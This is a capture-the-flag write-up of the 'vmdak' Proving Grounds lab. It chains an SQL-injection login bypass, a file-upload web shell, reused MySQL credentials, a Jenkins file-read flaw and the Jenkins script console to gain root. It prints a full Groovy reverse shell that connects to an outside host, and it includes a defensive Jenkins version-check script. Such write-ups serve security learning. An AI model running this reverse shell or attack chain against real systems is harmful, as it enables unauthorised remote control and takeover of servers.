vmdak - Proving Grounds Practice
Enumeration
Nmap
The initial nmap scan revealed that FTP, SSH, HTTP and a non-standard HTTPS port (9443) were open.
FTP Anonymous
FTP anonymous login was allowed, and the share contained a file named config.xml, which was a Jenkins configuration file. It revealed the Jenkins version and the location of the admin password file.
Web Enumeration
The HTTPS website on port 9443 was a Prison Management System site.
Exploit
CVE-2024-3438 (SQLi Login Bypass)
A vulnerability was found in SourceCodester Prison Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /Admin/login.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259691.
I found a CVE for bypassing the admin login on the Prison Management System website.
And I was able to log in.
CVE-2024-48594 (RCE)
File Upload vulnerability in Prison Management System v.1.0 allows a remote attacker to execute arbitrary code via the file upload component.
I found a repository (https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemRCE.md) which explains how to exploit file upload to obtain remote code execution.
At first I intercepted a profile photo editing request and changed the uploaded file to a PHP file.
Then I visited the /uploadImage/rev.php endpoint and obtained a reverse shell.
Database MySQL Enumeration
Later, I found a directory called database under the Prison Management System directory. Inside it I found a config file which revealed the MySQL root password.
Then I logged in to MySQL as root and started enumerating the database. I found an entry containing a user's password.
I tried it and obtained the user flag.
Privilege Escalation
Local Port Forwarding to Reach Jenkins
I remembered the config file we had found. So at first I executed netstat -ano | grep -i listen and found out that port 8080 was only listening on 127.0.0.1 (localhost).
ligolo-ng
So I set up a ligolo-ng agent and a ligolo-ng proxy and added a route for 240.0.0.0/4, which is ligolo-ng's special subnet for reaching the agent's localhost.
CVE-2024-23897 (Jenkins LFI)
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
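As an added defender-side check (not part of the original writeup), the following Python snippet tests a Jenkins version string against the affected ranges quoted above and pulls the version from the X-Jenkins response header, which Jenkins really sends; the sample header map is constructed for illustration.

```python
from __future__ import annotations

# Affected ranges as stated in the advisory text: weekly releases 2.441 and
# earlier, LTS releases 2.426.2 and earlier. The boundaries below are the
# first releases of each line that fall outside those ranges.
WEEKLY_FIXED_IN = (2, 442)
LTS_FIXED_IN = (2, 426, 3)


def parse_jenkins_version(version: str) -> tuple[int, ...]:
    """Parse '2.441' (weekly) or '2.426.2' (LTS) into a comparable tuple.

    Weekly versions have two numeric components, LTS versions three.
    Anything else is rejected so that a malformed banner is never
    silently treated as patched.
    """
    parts = version.strip().split(".")
    if len(parts) not in (2, 3) or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Jenkins version: {version!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable_cve_2024_23897(version: str) -> bool:
    """True when the version falls inside an affected range.

    LTS and weekly lines are compared against their own boundary, because
    an LTS 2.426.x build is patched independently of the weekly line.
    """
    parsed = parse_jenkins_version(version)
    boundary = LTS_FIXED_IN if len(parsed) == 3 else WEEKLY_FIXED_IN
    return parsed < boundary


def version_from_headers(headers: dict[str, str]) -> str | None:
    """Return the X-Jenkins header value (case-insensitive lookup), if present.

    Jenkins advertises its version in this header on ordinary responses,
    so an inventory script can read it without authenticating.
    """
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return value.strip()
    return None


if __name__ == "__main__":
    # Constructed sample response headers, not a capture from the lab host.
    sample = {"Content-Type": "text/html;charset=utf-8", "X-Jenkins": "2.426.2"}
    found = version_from_headers(sample)
    state = "affected" if is_vulnerable_cve_2024_23897(found) else "not affected"
    print(f"Jenkins {found}: {state} by CVE-2024-23897")
```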
Then I visited Jenkins and it prompted me for the admin password.
So, at first I looked up the Jenkins version and found out it was vulnerable to local file inclusion. I found exploit code for it (https://www.exploit-db.com/exploits/51993), simply executed it and read the administrator password.
After entering it, the Jenkins installation started.
Jenkins /script tab
Later, I visited the /script tab and simply wrote a Groovy reverse shell to obtain a root shell.
String host="192.168.45.245";
int port=8443;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();
s.close();
After clicking the Run button, I obtained a root shell.